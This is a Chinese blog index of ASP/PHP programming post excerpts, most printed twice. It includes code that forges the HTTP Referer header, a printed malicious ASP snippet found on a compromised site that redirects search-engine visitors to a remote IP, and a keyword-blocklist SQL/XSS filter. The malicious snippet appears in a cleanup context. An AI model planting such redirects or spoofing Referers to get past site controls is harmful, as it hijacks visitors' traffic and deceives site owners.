ASP,PHP与.NET伪造HTTP-REFERER方法及防止伪造REFERER的方法
[ 2012-01-10 09:01:26 | 作者: admin ]
HTTP-REFERER这个变量已经越来越不可靠了,完全就是可以伪造出来的东东。
以下是伪造方法:
ASP/Visual Basic代码
dim http
set http=server.createobject("MSXML2.XMLHTTP") '//MSXML2.serverXMLHTTP也可以
Http.open "GET",url,false
Http.setRequestHeader "Referer","http://www.52news.com/"
Http.send()
PHP(前提是装了curl):
PHP代码
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, "http://www.52news.com/xxx.asp");
curl_setopt ($ch, CURLOPT_REFERER, "http://www.52news.com/");
...
阅读全文…
以下是伪造方法:
ASP/Visual Basic代码
dim http
set http=server.createobject("MSXML2.XMLHTTP") '//MSXML2.serverXMLHTTP也可以
Http.open "GET",url,false
Http.setRequestHeader "Referer","http://www.52news.com/"
Http.send()
PHP(前提是装了curl):
PHP代码
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, "http://www.52news.com/xxx.asp");
curl_setopt ($ch, CURLOPT_REFERER, "http://www.52news.com/");
...
阅读全文…
防MSXML2.XMLHTTP采集方法
[ 2012-01-10 08:52:03 | 作者: admin ]
数据采集中的攻防策略-防止数据被采集的一种新方法
用Request.ServerVariables ("all_http")或Request.ServerVariables ("ALL_RAW")方法获取到的http请求报头
HTTP_ACCEPT:*/*
HTTP_ACCEPT_LANGUAGE:zh-cn
HTTP_CONNECTION:Keep-Alive
HTTP_HOST:192.168.1.54:81
HTTP_USER_AGENT:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP_COOKIE:ASPSESSIONIDASBBCRRQ=NDMJNFOCOEMAMJHEKDDEHKAP
HTTP_ACCEPT_ENCODING:gzip, deflate
被MSXML2.XMLHTTP采集时的http报头
...
阅读全文…
用Request.ServerVariables ("all_http")或Request.ServerVariables ("ALL_RAW")方法获取到的http请求报头
HTTP_ACCEPT:*/*
HTTP_ACCEPT_LANGUAGE:zh-cn
HTTP_CONNECTION:Keep-Alive
HTTP_HOST:192.168.1.54:81
HTTP_USER_AGENT:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP_COOKIE:ASPSESSIONIDASBBCRRQ=NDMJNFOCOEMAMJHEKDDEHKAP
HTTP_ACCEPT_ENCODING:gzip, deflate
被MSXML2.XMLHTTP采集时的http报头
...
阅读全文…
asp使用正则抓取数据的一个演示代码
[ 2011-12-23 10:52:13 | 作者: admin ]
p.s. 正则使用起来还是方便的,不过忘记了写法就去w3school温习下
<%
'演示1
dim str,reg
str="http://www.abc.com/abc_1_2/"
Set reg=new regexp
reg.global=True '设置为全文搜索
reg.ignorecase=True ‘忽略大小写
reg.pattern="http:\/\/www\.abc\.com\/abc_(\d+)_(\d+)\/"
str=reg.Replace(str,"http://www.abc.com/abc.asp?id=$1&Nid=$2")
response.write str
Set reg=nothing
%>
'演示1
dim str,reg
str="http://www.abc.com/abc_1_2/"
Set reg=new regexp
reg.global=True '设置为全文搜索
reg.ignorecase=True ‘忽略大小写
reg.pattern="http:\/\/www\.abc\.com\/abc_(\d+)_(\d+)\/"
str=reg.Replace(str,"http://www.abc.com/abc.asp?id=$1&Nid=$2")
response.write str
Set reg=nothing
%>
asp获取当前时间是第几周和指定周数的日期范围函数
[ 2011-12-05 08:33:34 | 作者: admin ]
获取当前时间是第几周函数:
阅读全文…
Function GetWeekNo(InputDate)
dim pytY,pytNewYear,pytNewYearWeek,pytAllDay,pytBanWeek,NumWeek
NumWeek = 0
pytY = Year(InputDate)
pytNewYear=pytY &"-1-1"
pytNewYearWeek = Weekday(pytNewYear)
pytAllDay = DateDiff("d",pytNewYear,InputDate)
pytBanWeek = 8-pytNewYearWeek
if pytBanWeek<7 Then
NumWeek = 1
pytAllDay = pytAllDay - pytBanWeek
end if
tempx = pytAllDay/7
...dim pytY,pytNewYear,pytNewYearWeek,pytAllDay,pytBanWeek,NumWeek
NumWeek = 0
pytY = Year(InputDate)
pytNewYear=pytY &"-1-1"
pytNewYearWeek = Weekday(pytNewYear)
pytAllDay = DateDiff("d",pytNewYear,InputDate)
pytBanWeek = 8-pytNewYearWeek
if pytBanWeek<7 Then
NumWeek = 1
pytAllDay = pytAllDay - pytBanWeek
end if
tempx = pytAllDay/7
阅读全文…
一个Asp团购API读取函数
[ 2011-11-01 14:35:21 | 作者: admin ]
出自:http://dev.tot.name/asp/html/20101123/20101123133239.htm
以下是团购XML文件的数据:
阅读全文…
以下是团购XML文件的数据:
<?xml version="1.0" encoding="utf-8" ?>
- <urlset>
- <url>
<loc>http://www.totcms.com/team.php?id=9</loc>
- <data>
- <display>
<website>totcms</website>
<siteurl>http://www.totcms.com</siteurl>
<city>全国</city>
<title>卖疯啦!超推荐之Dior史上最佳睫毛膏!36元抢购迪奥BlackOut后台炫黑睫毛膏!内含古埃及艳后专用睫毛碳粉,超黑妆效,极致惊艳埃及艳后的惊艳妆效你真的可以轻松拥有</title>
...- <urlset>
- <url>
<loc>http://www.totcms.com/team.php?id=9</loc>
- <data>
- <display>
<website>totcms</website>
<siteurl>http://www.totcms.com</siteurl>
<city>全国</city>
<title>卖疯啦!超推荐之Dior史上最佳睫毛膏!36元抢购迪奥BlackOut后台炫黑睫毛膏!内含古埃及艳后专用睫毛碳粉,超黑妆效,极致惊艳埃及艳后的惊艳妆效你真的可以轻松拥有</title>
阅读全文…
有个网站运行缓慢,IIS日志中发现有大量超时
[ 2011-08-04 15:10:31 | 作者: admin ]
日志中有若干访问频繁的文件返回超时错误
这些代码都很简单,看起来像刷流量和跳广告用,删除就OK了
<%
Dim REFERER
REFERER = Cstr(Request.ServerVariables("HTTP_REFERER"))
Dim server
server = request.ServerVariables("SERVER_NAME")
If InStr(REFERER,"baidu.com") > 0 Or InStr(REFERER,"google") > 0 Or InStr(REFERER,"soso") > 0 Or InStr(REFERER,"sogou") > 0 Then
Randomize
Response.Redirect("http://121.12.117.3:808/cxl/mxd.html?" & server)...
阅读全文…
这些代码都很简单,看起来像刷流量和跳广告用,删除就OK了
<%
Dim REFERER
REFERER = Cstr(Request.ServerVariables("HTTP_REFERER"))
Dim server
server = request.ServerVariables("SERVER_NAME")
If InStr(REFERER,"baidu.com") > 0 Or InStr(REFERER,"google") > 0 Or InStr(REFERER,"soso") > 0 Or InStr(REFERER,"sogou") > 0 Then
Randomize
Response.Redirect("http://121.12.117.3:808/cxl/mxd.html?" & server)
阅读全文…
asp与access中关于日期类型时间类型的判断问题
[ 2011-03-05 15:15:17 | 作者: admin ]
asp得到access中日期类型大于2009-9-9的数据
或者
select * from [table] where [datetime] > #2009-9-9#
或者
SELECT * FROM table WHERE datediff("d",#2009-9-9#,[datetime])>0
asp对于sql注入和xss的过滤函数
[ 2011-01-27 13:43:26 | 作者: admin ]
'*********************************************
'检查SQL字符串,并进行过滤
'*********************************************
function ChkSql(mysql)
if isnull(mysql) or isempty(mysql) or mysql="" then
mysql = ""
elseif IsNumeric(mysql) then
mysql = mysql
else
mysql = trim(mysql)
mysql = replace(mysql,"'","‘",1,-1,1)'不区分大小写
mysql = replace(mysql,"exec","e xec",1,-1,1)
...'检查SQL字符串,并进行过滤
'*********************************************
function ChkSql(mysql)
if isnull(mysql) or isempty(mysql) or mysql="" then
mysql = ""
elseif IsNumeric(mysql) then
mysql = mysql
else
mysql = trim(mysql)
mysql = replace(mysql,"'","‘",1,-1,1)'不区分大小写
mysql = replace(mysql,"exec","e xec",1,-1,1)
阅读全文…